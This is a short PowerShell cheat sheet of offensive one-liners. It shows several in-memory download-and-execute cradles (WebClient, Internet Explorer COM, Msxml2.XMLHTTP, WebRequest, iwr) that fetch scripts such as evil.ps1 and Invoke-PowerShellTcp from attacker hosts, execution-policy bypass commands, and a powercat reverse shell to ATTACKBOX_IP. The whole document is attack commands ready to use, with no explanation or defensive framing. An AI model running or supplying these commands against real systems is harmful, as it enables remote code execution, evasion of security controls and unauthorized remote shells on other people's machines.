iex (New-Object Net.WebClient).DownloadString('<https://webserver/payload.ps1>')
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('<http://192.168.230.1/evil.ps1> ');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
iex(iwr '<http://172.16.100.62:8081/Invoke-PowerShellTcp-m.ps1>' -UseBasicParsing)
iex (iwr '<http://192.168.230.1/evil.ps1>')
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','<http://192.168.230.1/evil.ps1>',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("<http://192.168.230.1/evil.ps1>")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
powershell –ExecutionPolicy bypass
powershell –c <cmd>
powershell –encodedcommand
$env:PSExecutionPolicyPreference="bypass"

PowerShell Reverse Shell

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"